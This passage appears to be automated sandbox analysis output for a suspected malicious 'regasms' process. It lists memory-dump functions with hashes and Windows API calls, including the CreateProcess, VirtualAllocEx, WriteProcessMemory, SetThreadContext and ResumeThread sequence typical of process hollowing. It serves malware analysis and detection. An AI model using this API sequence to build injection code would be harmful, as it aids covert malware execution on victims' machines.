                                  • Instruction Fuzzy Hash: 03430774A00619CFDB24DF68C888A9DB7B2BF89311F158599E409EB361DB35ED82CF44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1437095337.0000000008870000.00000040.00000800.00020000.00000000.sdmp, Offset: 08870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8870000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (oq$(oq$,q$,q$Hq
                                  • API String ID: 0-962059274
                                  • Opcode ID: 27dd888c965f2d3f93e5064d31ebb353b1eeac6f9ac081c87834844c7417b9af
                                  • Instruction ID: 83a298da89a920126756ae385249c16c3ce092b63f2b8f97c18d00d9a35f9612
                                  • Opcode Fuzzy Hash: 27dd888c965f2d3f93e5064d31ebb353b1eeac6f9ac081c87834844c7417b9af
                                  • Instruction Fuzzy Hash: CA52C335B00215DFDB14DF69D488AADBBB2FF88351B558069E806DB760CB31EC42DB91

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Gq
                                  • API String ID: 0-2351003426
                                  • Opcode ID: a0be3b788ffa80474397c7ac9022cc232f11c44b74ff2c27d0b8492c62d0b198
                                  • Instruction ID: aaa40a6a9b2fb8a2dc4f114da7e468eec7f13e4e47dd6139548df262369d4ea0
                                  • Opcode Fuzzy Hash: a0be3b788ffa80474397c7ac9022cc232f11c44b74ff2c27d0b8492c62d0b198
                                  • Instruction Fuzzy Hash: 7D13C734A11219CFCB15DF28C898AD9B7B1FF89310F5181E9E909AB361DB71AE85CF41

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Gq
                                  • API String ID: 0-2351003426
                                  • Opcode ID: 1d652efed4e3b0376f3bd21041e4b0c22b3be0d0313067bc3f41a4620ad8c648
                                  • Instruction ID: 3295fd3d61da94c74239c1e23bb2109dc6ae1cf94b6c66eb30be5632b6bc33e4
                                  • Opcode Fuzzy Hash: 1d652efed4e3b0376f3bd21041e4b0c22b3be0d0313067bc3f41a4620ad8c648
                                  • Instruction Fuzzy Hash: 0013C734A11219CFCB15DF28C898AD9B7B1FF89310F5181E9E909AB361DB71AE85CF41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1437095337.0000000008870000.00000040.00000800.00020000.00000000.sdmp, Offset: 08870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8870000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
                                  • Opcode ID: 6051adcfdd5470d165ad761cd217b4a3bce75807ce76d51e308eeea421018c97
                                  • Instruction ID: 68cf6a11e346cb96b1605b1b4fc6c90ca97c3ce58efd932048e94b0bc5723b6f
                                  • Opcode Fuzzy Hash: 6051adcfdd5470d165ad761cd217b4a3bce75807ce76d51e308eeea421018c97
                                  • Instruction Fuzzy Hash: A162CE74E01228CFDB24DF69C988BDDBBB2BB89301F5081E9D449A7255DB34AE85CF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1437095337.0000000008870000.00000040.00000800.00020000.00000000.sdmp, Offset: 08870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8870000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
                                  • Opcode ID: e03f44256dcd9b380617c2dfb1cc002cece0fe39126c4bfc3c7c3a6c1ef604d1
                                  • Instruction ID: ae3f25b03278bfcb96eef9b286571f322998ca111963f604edec70e9e34fe287
                                  • Opcode Fuzzy Hash: e03f44256dcd9b380617c2dfb1cc002cece0fe39126c4bfc3c7c3a6c1ef604d1
                                  • Instruction Fuzzy Hash: 1B510675E04228CFDB24DF66C8447EEBBB2AB89301F40C1AAD419A7654DB345A86CF40
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ddf00fb8df03399f9edf9b1482e8e20d39247360ff265345a815c1b2debdeb1
                                  • Instruction ID: fa54d49d78da2b33be2f764f06434aac9ad258dd668f5b09e7fce407e68327a4
                                  • Opcode Fuzzy Hash: 5ddf00fb8df03399f9edf9b1482e8e20d39247360ff265345a815c1b2debdeb1
                                  • Instruction Fuzzy Hash: CA22DDB0B11215AFDB15DB69C550BAEB7F7AF88300F108469E906DB7A1CB30ED42CB51
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7228f369f640bf5437b1ba02c591beb3b5ddd4c87f39560fa37a3778a22d0016
                                  • Instruction ID: 26a88e5417fa1aafc0c65738a357a15a1c2a112230ceb7b47d2b8264cd9d49c4
                                  • Opcode Fuzzy Hash: 7228f369f640bf5437b1ba02c591beb3b5ddd4c87f39560fa37a3778a22d0016
                                  • Instruction Fuzzy Hash: 87A1A135E003199FCB05DFA4D894ADDBBB6FF89310F548215E916AB2A4DF30AD45CB90
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21a38dadc83ba1d149f873667c6ec5e39093a42e4c3001b93919b02e135a215b
                                  • Instruction ID: 60b03e918dd14e4241b1be70d4b450b0941810bf41f7d9524205f7d26d30123a
                                  • Opcode Fuzzy Hash: 21a38dadc83ba1d149f873667c6ec5e39093a42e4c3001b93919b02e135a215b
                                  • Instruction Fuzzy Hash: 9A917035E003199FCB05DFA4D8949DDBBBAFF89310F548215E916AB2A4DF30E985CB50
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d87df359ef682d50c4304b40921076b40955b68b17e2484128115b20cf4d971c
                                  • Instruction ID: f7de7d852ee698d5d8c4c166f0d61d0496f4541601d875f1bf4c9240a2123697
                                  • Opcode Fuzzy Hash: d87df359ef682d50c4304b40921076b40955b68b17e2484128115b20cf4d971c
                                  • Instruction Fuzzy Hash: 67916035E003199FCB05DFA4D8949DDBBB6FF89310F588215E916AB264DF30A985CB90
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c076cd104d51a4ab41ec34fa5a6df83b70b66b365b1636bc17fc97547647f16b
                                  • Instruction ID: bfbab7de3216b1366c356c519a0ffe14a40402610222649dcc9ec14ec72256b0
                                  • Opcode Fuzzy Hash: c076cd104d51a4ab41ec34fa5a6df83b70b66b365b1636bc17fc97547647f16b
                                  • Instruction Fuzzy Hash: 5881C774E013089FDF18EFA9D994ADEBBB2FF89310F148129E415AB365DA345982CF50
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c096df50323f6dc6061f135376c6a3fbe874a1709d83ee3654a04826c58b0b14
                                  • Instruction ID: a8bb71bf1ff51dd69ff7705b3fa805743d60823f2b1dbded0179cd8499e84c38
                                  • Opcode Fuzzy Hash: c096df50323f6dc6061f135376c6a3fbe874a1709d83ee3654a04826c58b0b14
                                  • Instruction Fuzzy Hash: 085129B2D39228EBDB04CFA6D4846EDBBFAFB4A300F14A025D409B3651DB758446DF04
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2de1e74a24b94ec02a1b4a6f50e1d8b6696f274e3d5dbf3f727d2a227c5947d
                                  • Instruction ID: 9c583305d9af2499ec5eae6e84cb36ba66a4828b4233a7eaba0a05845e9bbd9a
                                  • Opcode Fuzzy Hash: b2de1e74a24b94ec02a1b4a6f50e1d8b6696f274e3d5dbf3f727d2a227c5947d
                                  • Instruction Fuzzy Hash: C8511670E012489FDB18DFA9D991ADEBBB2BF89300F148129E415BB365DA345D46CF90
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7033c3ce2df0b87d3f106cc2a3e1c5a559c4b101c68dfedaffeea8eed3cb63a9
                                  • Instruction ID: 2d396ff6c98ea822bca7116708e573c756a2abdae238872cc914aafefa465d74
                                  • Opcode Fuzzy Hash: 7033c3ce2df0b87d3f106cc2a3e1c5a559c4b101c68dfedaffeea8eed3cb63a9
                                  • Instruction Fuzzy Hash: B7413FB6D29218EBDB04CFA6D4842EDBBFABF4A310F14E025D409B3655DB758446DF40

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00A1D5FE
                                  • GetCurrentThread.KERNEL32 ref: 00A1D63B
                                  • GetCurrentProcess.KERNEL32 ref: 00A1D678
                                  • GetCurrentThreadId.KERNEL32 ref: 00A1D6D1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 41fa675d904d12b1aa5844108e493cb2dc76f9ae186eaf2bfe6a6d9c001fe551
                                  • Instruction ID: 49654b1de0961c5a3d06173f721442d1cfaf26699da4daf546607554f72786f0
                                  • Opcode Fuzzy Hash: 41fa675d904d12b1aa5844108e493cb2dc76f9ae186eaf2bfe6a6d9c001fe551
                                  • Instruction Fuzzy Hash: E05176B1900749CFEB15CFA9C648BDEBBF1EF88304F20845AE019AB391D7345984CB26

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00A1D5FE
                                  • GetCurrentThread.KERNEL32 ref: 00A1D63B
                                  • GetCurrentProcess.KERNEL32 ref: 00A1D678
                                  • GetCurrentThreadId.KERNEL32 ref: 00A1D6D1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8q$8q$8q
                                  • API String ID: 0-3169173723

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$$q$$q
                                  • API String ID: 0-3275118826

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q$Hq
                                  • API String ID: 0-1154169777

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %*&/)(#$^@!~-_$0,Gq
                                  • API String ID: 0-773394015

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %*&/)(#$^@!~-_$0,Gq
                                  • API String ID: 0-773394015

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q$$q
                                  • API String ID: 0-3126353813
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07225F1E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07225F1E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00A1B566
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05851F02
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05851F02
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00A159C9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05854471
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00A159C9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07225AF0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07225AF0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07225946
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  APIs
                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07225BD0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A1D84F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  APIs
                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07225BD0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07225946
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A1D84F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07225A0E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 9b2b01e747f466a5db6052169c895c37a85520c79c0d91b8ae70273471977599
                                  • Instruction ID: 87cc86cc5a9943d7eba54e9c7c797c0799c71e8cd636c3e96dfefd986899a272
                                  • Opcode Fuzzy Hash: 9b2b01e747f466a5db6052169c895c37a85520c79c0d91b8ae70273471977599
                                  • Instruction Fuzzy Hash: 62116A76800348DFDB10DFAAC841BEEBFF5EF48310F108419E515A7250C7759554CBA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: c3b485b98a62f009851a1b47350875435e124866ec577eea1af3d58f3e1e9e15
                                  • Instruction ID: 2c088a74fb946accb2976599f8b958cebb13e68b7363460c53c5234a287c3264
                                  • Opcode Fuzzy Hash: c3b485b98a62f009851a1b47350875435e124866ec577eea1af3d58f3e1e9e15
                                  • Instruction Fuzzy Hash: 96118BB5C003089FDB20DFAAC4457EEFBF4EB88320F20841AD519A7640CB75A541CBA5
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07225A0E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 44d2ab29bc48cfcccb41588b6de143585a2d2a47ede109e9fd4b8c39317a354a
                                  • Instruction ID: c8530f38e3661b244b9a261b9a157b0bc131d5baf667426cfa529ae6fcc6dcf5
                                  • Opcode Fuzzy Hash: 44d2ab29bc48cfcccb41588b6de143585a2d2a47ede109e9fd4b8c39317a354a
                                  • Instruction Fuzzy Hash: 7D1156728003499FDB20DFAAC845BEEBBF5EF48310F208819E515A7250CB759540CBA0
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07229DFD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 65824a829e2103ad6d15b707befabdbdef4fba5b4fdfcabece40c3968d8c564c
                                  • Instruction ID: b81e1b3b2c7f71b76efa1a3d600350469eb60cf206552724b89c187ebde3626f
                                  • Opcode Fuzzy Hash: 65824a829e2103ad6d15b707befabdbdef4fba5b4fdfcabece40c3968d8c564c
                                  • Instruction Fuzzy Hash: 4F11F8B6800259EFDB10DF9AD885BDEFBF8EB48310F208459E554A7250C375A584CFA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 475447e0e016b8223e8f59ed34384cdcf0c8a48f45076b9fd0d38cb3242b35ab
                                  • Instruction ID: 4a4895e487896e1b2c86f86a142f908967bbb4215bb10a43b10bd522f84a2534
                                  • Opcode Fuzzy Hash: 475447e0e016b8223e8f59ed34384cdcf0c8a48f45076b9fd0d38cb3242b35ab
                                  • Instruction Fuzzy Hash: 871125B1D003499FDB24DFAAC4447EEFBF4EB88220F24845AD519A7240CA79A941CBA5
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00A1B566
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: abbf1911150f2926cfc44842dbfb333b984fd2263d6001b3d194116363450584
                                  • Instruction ID: 99210c5d2e59c134c2db1c564f2d5b98e261b3a5299f50fe29de376cfedaf97d
                                  • Opcode Fuzzy Hash: abbf1911150f2926cfc44842dbfb333b984fd2263d6001b3d194116363450584
                                  • Instruction Fuzzy Hash: 1211DFB6C00649CFDB20DF9AC544ADEFBF5EB88320F10841AD469B7610D379A545CFA5
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07229DFD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: ffb2b481c8326feae53eb22ccd7671aa751bdd545357282e5653016edf16241b
                                  • Instruction ID: 81b2683565f1b2c17515def33bf9bee0a9ff4cde2252480125efc7ecd084f368
                                  • Opcode Fuzzy Hash: ffb2b481c8326feae53eb22ccd7671aa751bdd545357282e5653016edf16241b
                                  • Instruction Fuzzy Hash: 1711F5B5810359EFDB20DF9AC489BDEBBF8EB48310F108459E558B7240C375A944CFA5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q
                                  • API String ID: 0-2414175341
                                  • Opcode ID: 51f7d68efa73b9c612e2168ed1772c26ad7a3ba4918366d8e53ea2765d0e964b
                                  • Instruction ID: 83d896831ff2b46f12c8e42b49a7e5bb641a35ec5776c4227cc1140c1f31f9f8
                                  • Opcode Fuzzy Hash: 51f7d68efa73b9c612e2168ed1772c26ad7a3ba4918366d8e53ea2765d0e964b
                                  • Instruction Fuzzy Hash: A271C230A003059FEB65DB65D844BAEB7F6EFC8300F10842AE5169B390DF74AE85DB90
                                  Strings
                                  Memory Dump Source
